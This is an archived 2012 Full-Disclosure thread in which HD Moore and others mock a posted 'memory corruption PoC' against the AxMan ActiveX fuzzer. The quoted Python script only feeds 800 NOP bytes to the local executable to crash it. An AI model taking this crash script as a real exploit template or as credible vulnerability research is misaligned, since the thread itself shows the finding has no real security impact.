lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Wed, 01 Aug 2012 11:29:57 +0100
From: Giles Coochey <giles@...chey.net>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: AxMan ActiveX fuzzing <== Memory Corruption
 PoC

When can we expect a metasploit module for this l33t c0d3?;-)

On 01/08/2012 08:38, Carlo Di Dato wrote:
> Mr. Moore,
> I am surprised you didn't released immediately a patch to address this
> critical vulnerability :-)
>
> P.S.
> I can't understand why Awsome coolkaveh didn't sell this vuln to ZDI or
> stuff like that :-)
>
> Il 31.07.2012 16:19 HD Moore ha scritto:
>> In other news, running local commands grants code execution :)
>>
>> I am surprised you didn't allocate a CVE,
>>
>> -HD
>>
>> -----Original Message-----
>> From: full-disclosure-bounces@...ts.grok.org.uk
>> [mailto:full-disclosure-bounces@...ts.grok.org.uk] On Behalf Of kaveh
>> ghaemmaghami
>> Sent: Saturday, July 28, 2012 7:21 PM
>> To: full-disclosure@...ts.grok.org.uk
>> Subject: [Full-disclosure] AxMan ActiveX fuzzing <== Memory
>> Corruption PoC
>>
>> Exploit Title: AxMan ActiveX fuzzing <== Memory Corruption PoC
>> Crash : http://imageshack.us/f/217/axman.jpg/
>> Date: July 28, 2012
>> Author: coolkaveh
>> coolkaveh@...ketmail.com
>> Https://twitter.com/coolkaveh
>> Vendor Homepage: http://digitaloffense.net/tools/axman/
>> version : 1.0.0
>> Tested on: windows 7 SP1
>> ========================================================
>>                                      Crash The Exploiter
>>               Lame HD Moore fuzzer Memory Corruption
>>                                    By Awsome coolkaveh
>>
>>
>> ----------------------------------------------------------------------------
>> ---------------------------
>>
>> import os
>> import win32api
>> crash = "                  Crash The Exploiter          "
>> lame="        Lame HD Moore fuzzer Memory corruption  "
>> awsome="               By Awsome coolkaveh          "
>> print
>> print
>> print
>> print crash
>> print
>> print lame
>> print
>> print awsome
>> print
>> print
>> print
>> print
>> exploit = ("\x90" *800)
>> win32api.WinExec((r'"D:\axman-1.0.0\bin\axman.exe" %s') % exploit, 1)
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/


-- 
Regards,

Giles Coochey, CCNA, CCNAS
NetSecSpec Ltd
+44 (0) 7983 877438
http://www.coochey.net
http://www.netsecspec.co.uk
giles@...chey.net



Download attachment "smime.p7s" of type "application/pkcs7-signature" (4941 bytes)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ